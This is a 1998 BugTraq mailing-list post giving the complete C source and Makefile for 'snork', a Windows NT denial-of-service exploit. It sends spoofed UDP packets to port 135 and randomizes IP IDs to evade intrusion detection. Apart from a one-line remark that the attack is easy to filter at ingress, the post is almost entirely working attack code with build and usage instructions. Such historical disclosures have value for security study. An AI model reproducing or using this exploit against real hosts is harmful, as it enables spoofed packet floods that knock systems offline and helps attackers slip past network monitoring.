Snork exploit
Date: Tue, 29 Sep 1998 15:36:27 -0700
From: route@RESENTMENT.INFONEXUS.COM
To: BUGTRAQ@netspace.org
Subject: Snork exploit
Snork exploit code as per the ISS X-force advisory. Needs libnet.
http://www.infonexus.com/~daemon9/Libnet. This exploit painfully
easy to prevent at the point of ingress. Let's hop to it, huh?
You can extract the Makefile and C code via the Phrack Magazine
extraction utility, or just manually seperate the files.
<++> Snork/Makefile
# route|daemon9 <route@infonexus.com>
CFLAGS = -O3 -funroll-loops -fomit-frame-pointer -pipe -m486 -Wall
OBJECTS = snork.o
LIBS = -lnet
.c.o:
$(CC) $(CFLAGS) $(DEFINES) -c $< -o $@
all: snork
snork: $(OBJECTS)
$(CC) snork.o $(LIBS) -o ./snork
dist: clean
@(cd ..; rm snork.tgz; tar cvzf snork.tgz Snork/)
clean:
rm -f core snork *.o
# EOF
<-->
<++> Snork/snork.c
/*
* $Id: snork.c,v 1.1 1998/09/29 05:20:15 root Exp root $
*
* snork.c - Windows NT UDP killer
*
* Written as per the ISS X force advisory.
*
* Building:
*
* This compiles under: OpenBSD, FreeBSD, Linux, Solaris and possibly others.
* (Solaris port remains broken until libnet gets fixed for solaris checksums).
* You need libnet to compile this exploit. It's all very simple:
* 1) get the library from http://www.infonexus.com/~daemon9/Libnet
* 2) build the library.
* 3) install the library.
* 4) compile this exploit.
*
* Usage:
*
* ./snork target
* Spoofs packets from target to target.
*
* ./snork source target
* Spoofs packets from source to target.
*
* route|daemon9 <route@infonexus.com>
*
*/
#include <libnet.h>
#include <string.h>
#define SENDAMT 10
#define SPORT 135
#define DPORT 135
int
main(int argc, char **argv)
{
int sock, c, i, payload_s;
u_char *buf, *payload;
u_long ip_src, ip_dst;
if (argc > 3 || argc < 2)
{
fprintf(stderr, "No retard.\nUsage:\tsnork [source] target\n");
exit(EXIT_FAILURE);
}
if ((ip_src = name_resolve(argv[1], 1)) == -1)
{
fprintf(stderr, "What the hell kind of IP address is: `%s`?\n", argv[1]);
exit(EXIT_FAILURE);
}
if (argc == 3)
{
if ((ip_dst = name_resolve(argv[2], 1)) == -1)
{
fprintf(stderr, "What the hell kind of IP address is: `%s`?\n", argv[1]);
exit(EXIT_FAILURE);
}
}
else
{
ip_dst = ip_src;
}
printf("Hi. Read Phrack. Thanks.\n");
if ((payload = getenv("HOST")) == NULL)
{
payload = "i am lame dos kid but i read phrack so it's ok";
}
payload_s = strlen(payload);
buf = malloc(UDP_H + IP_H + payload_s);
if (!buf)
{
perror("No memory for packet header");
exit(1);
}
/*
* Don't use raw sockets. They suck.
*/
sock = open_raw_sock(IPPROTO_RAW);
if (sock == -1)
{
perror("No socket");
exit(1);
}
/*
* We will randomize the ip_id for good measure. I've seen crappy NIDS
* code that looks for exploits like this by fixing in on static header
* fields.
*/
seed_prand();
for (i = 0; i < SENDAMT; i++)
{
/*
* Build the IP header.
*/
build_ip(UDP_H + payload_s, /* total payload size */
get_prand(PRu16), /* IP ID */
0, /* fragmentation bits */
64, /* IP TTL */
IPPROTO_UDP, /* transport protocol */
ip_src, /* source IP */
ip_dst, /* destination IP */
NULL, /* payload pointer */
0, /* payload size */
buf); /* packet header memory */
/*
* Build the UDP header.
*/
build_udp(SPORT, DPORT, payload, payload_s, buf + IP_H);
/*
* UDP checksum (IP check is done by mr kernel, as always).
*/
do_checksum(buf, IPPROTO_UDP, UDP_H + payload_s);
/*
* Write the packet to the network.
*/
c = write_ip(sock, buf, UDP_H + IP_H + payload_s);
if (c < UDP_H + IP_H + payload_s)
{
fprintf(stderr, "write_ip: only wrote %d bytes\n", c);
}
fprintf(stderr, "."); /* no buffering, please */
}
printf("\nsnork snork\n");
free(buf);
exit (EXIT_SUCCESS);
}
/* EOF */
<-->
--
I live a world of paradox... My willingness to destroy is your chance for
improvement, my hate is your fate -- my failure is your victory, a victory
that won't last.
